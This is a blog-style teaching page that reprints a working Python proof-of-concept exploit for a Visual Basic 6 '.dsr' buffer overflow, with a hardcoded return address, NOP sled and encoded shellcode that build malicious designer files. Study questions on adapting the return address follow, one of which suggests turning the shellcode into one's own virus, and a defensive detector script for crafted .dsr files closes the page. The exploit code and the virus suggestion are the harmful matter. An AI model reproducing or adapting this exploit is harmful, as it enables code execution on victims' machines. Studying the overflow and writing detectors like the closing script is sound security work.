The Most Elementary Stack Overflow Analysis Problem
Source: Internet  Published: vue.js video tutorials  Editor: 程序博客网  Time: 2024/05/20 01:33
import time

print "---------------------------------------------------------------------------"
print ' MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling Buffer Overflow\n'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " connection or command name."
print "---------------------------------------------------------------------------"

EIP = "\xFF\xBE\x3F\x7E"  # call ESP from user32.dll
nop = "\x90\x90\x90\x90"
shellcode = \
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"

try:
    choice = int(raw_input('Choose 1 for "ConnectionName", 2 for "CommandName" bof or '+\
                           '3 to quit:\n==> '))
    if choice == 1:
        buff = 'Connection1' + " " * 559 + EIP + "A" * 12 + nop + shellcode + nop
        try:
            vb_dsr = \
            'VERSION 5.00\n'+\
            'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\
            '   ClientHeight    =   6315\n'+\
            '   ClientLeft      =   0\n'+\
            '   ClientTop       =   0\n'+\
            '   ClientWidth     =   7935\n'+\
            '   _ExtentX        =   13996\n'+\
            '   _ExtentY        =   11139\n'+\
            '   FolderFlags     =   1\n'+\
            '   TypeInfoCookie  =   0\n'+\
            '   Version         =   4\n'+\
            '   NumConnections  =   1\n'+\
            '   BeginProperty Connection1\n'+\
            '      ConnectionName  =   "' + buff + '"\n'+\
            '      ConnDispId      =   1001\n'+\
            '      SourceOfData    =   3\n'+\
            '      QuoteChar       =   34\n'+\
            '      SeparatorChar   =   46\n'+\
            '   EndProperty\n'+\
            '   NumRecordsets   =   0\n'+\
            'End' + "\x0D\x0A"  # "\x0D\x0A" ==> EOF
            out_file = open('ConnectionName.dsr', 'w')
            out_file.write(vb_dsr)
            out_file.close()
            print "FILE CREATED!"
        except:
            print "Something wrong in file creation!"
    if choice == 2:
        buff = 'Command1' + " " * 566 + EIP + "A" * 12 + nop + shellcode + nop
        try:
            vb_dsr = \
            'VERSION 5.00\n'+\
            'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n'+\
            '   ClientHeight    =   6315\n'+\
            '   ClientLeft      =   0\n'+\
            '   ClientTop       =   0\n'+\
            '   ClientWidth     =   7935\n'+\
            '   _ExtentX        =   13996\n'+\
            '   _ExtentY        =   11139\n'+\
            '   FolderFlags     =   1\n'+\
            '   TypeInfoCookie  =   0\n'+\
            '   Version         =   4\n'+\
            '   NumConnections  =   1\n'+\
            '   BeginProperty Connection1\n'+\
            '      ConnectionName  =   "Connection1"\n'+\
            '      ConnDispId      =   1001\n'+\
            '      SourceOfData    =   3\n'+\
            '      QuoteChar       =   34\n'+\
            '      SeparatorChar   =   46\n'+\
            '   EndProperty\n'+\
            '   NumRecordsets   =   1\n'+\
            '   BeginProperty Recordset1\n'+\
            '      CommandName     =   "' + buff + '"\n'+\
            '      CommDispId      =   1002\n'+\
            '      RsDispId        =   -1\n'+\
            '      ActiveConnectionName=   "Connection1"\n'+\
            '      NumFields       =   0\n'+\
            '      NumGroups       =   0\n'+\
            '      ParamCount      =   0\n'+\
            '      RelationCount   =   0\n'+\
            '      AggregateCount  =   0\n'+\
            '   EndProperty\n'+\
            'End' + "\x0D\x0A"  # "\x0D\x0A" ==> EOF
            out_file = open('CommandName.dsr', 'w')
            out_file.write(vb_dsr)
            out_file.close()
            print "FILE CREATED!"
        except:
            print "Something wrong in file creation!"
    if choice == 3:
        print "Be safe!"
    if choice != 1 and choice != 2 and choice != 3:
        print "D'oh! You MUST choose a value between 1 and 3"
except:
    print "mmm... ok, you want it..."
    time.sleep(4)
    print "London Bridge is falling down,\nFalling down, falling down\nLondon Bridge is falling down\nMy fair lady" * 99999
Questions:
*.dsr file analysis
1. Find a real .dsr file and compare it with the vb_dsr string: the typical size of a .dsr file, its format, and especially its EOF marker. That marker must not appear inside your shellcode, or the shellcode may not behave as expected.
Source code analysis
2. What does the variable EIP stand for? Using a debugger such as OllyDbg, can you replace it with another address that holds the same CALL ESP instruction? Could you replace User32.dll with another DLL that VB 6.0 necessarily loads, and then adjust the EIP address accordingly? Finally, discuss whether CALL ESP could be replaced by JMP ESP. (Hint: the addresses of such instructions, like those of the APIs, differ between DLL releases, so it is advisable to locate them on your own machine with a tool such as Depends.)
3. Notice that between EIP and the shellcode there are 16 bytes that serve no apparent purpose. Explain why.
Shellcode analysis
4. If you have solved the first three questions, you are now familiar with the principle of a local BOF. The remaining work is to determine what the shellcode does by referencing the Intel machine-code manual; after that you can modify it into your own virus.
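The .dsr layout that question 1 asks about (line-oriented `Key = value` properties, string values in double quotes, CRLF line endings) is also what a defender would parse to spot a crafted designer file before it reaches the IDE. The following Python 3 script is an added example for this page, not shinnai's code: it parses the property lines of a .dsr and flags ConnectionName/CommandName values that are oversized or contain non-printable bytes. The 255-byte bound, the set of checked keys and both sample files are constructed for this example; the oversized sample uses inert placeholder bytes where the PoC puts its address and payload.

```python
import re

# A .dsr designer file is line-oriented text: `Key = value` pairs nested between
# Begin/End and BeginProperty/EndProperty markers, string values in double quotes.
PROP_RE = re.compile(rb'^[ \t]*([A-Za-z_][A-Za-z0-9_]*)[ \t]*=[ \t]*(.*?)[ \t\r]*$')

# Name properties the overflow on this page targets. The length bound is an
# assumption for this example: legitimate designer names are short identifiers,
# while the PoC pads the name to well over 500 bytes before the return address.
NAME_KEYS = {"ConnectionName", "CommandName", "ActiveConnectionName"}
MAX_NAME_LEN = 255


def parse_dsr_properties(data):
    """Return [(key, value, line_no)] for every `Key = value` line in a .dsr.

    Quoted string values are returned without their surrounding quotes;
    everything else (numbers, GUIDs) is returned as the raw bytes.
    """
    props = []
    for line_no, line in enumerate(data.splitlines(), start=1):
        m = PROP_RE.match(line)
        if not m:
            continue  # VERSION / Begin / BeginProperty / End lines carry no '='
        key, value = m.group(1).decode("ascii"), m.group(2)
        if len(value) >= 2 and value[:1] == b'"' and value[-1:] == b'"':
            value = value[1:-1]
        props.append((key, value, line_no))
    return props


def find_suspicious(data, max_len=MAX_NAME_LEN):
    """Flag name properties that are oversized or carry non-printable bytes.

    Returns [(line_no, key, reason)] with reason in {"oversized", "nonprintable"}.
    """
    findings = []
    for key, value, line_no in parse_dsr_properties(data):
        if key not in NAME_KEYS:
            continue
        if len(value) > max_len:
            findings.append((line_no, key, "oversized"))
        if any(b < 0x20 or b > 0x7E for b in value):
            findings.append((line_no, key, "nonprintable"))
    return findings


def build_dsr(connection_name):
    """Constructed sample .dsr with one connection, modelled on the layout above."""
    return (b'VERSION 5.00\r\n'
            b'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\r\n'
            b'   ClientHeight    =   6315\r\n'
            b'   NumConnections  =   1\r\n'
            b'   BeginProperty Connection1\r\n'
            b'      ConnectionName  =   "' + connection_name + b'"\r\n'
            b'      ConnDispId      =   1001\r\n'
            b'   EndProperty\r\n'
            b'   NumRecordsets   =   0\r\n'
            b'End\r\n')


# Constructed inputs: a normal designer file, and one whose name field is padded
# the way the PoC does (placeholder bytes stand in for the address and payload).
BENIGN_DSR = build_dsr(b"Connection1")
OVERSIZED_DSR = build_dsr(b"Connection1" + b" " * 559 + b"BBBB" + b"A" * 12 + b"\x01\x02\x03\x04")


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_DSR), ("oversized", OVERSIZED_DSR)):
        hits = find_suspicious(sample)
        print("%s: %d finding(s)" % (label, len(hits)))
        for line_no, key, reason in hits:
            print("  line %d: %s -> %s" % (line_no, key, reason))
```

Run it on any .dsr you have read in as bytes (`find_suspicious(open(path, "rb").read())`); on a genuine designer file the name values are short identifiers and the script reports nothing, while the padded sample produces two findings on the ConnectionName line. Working on bytes rather than decoded text matters here: the bytes that make a payload dangerous are exactly the ones a text decoder would mangle or reject.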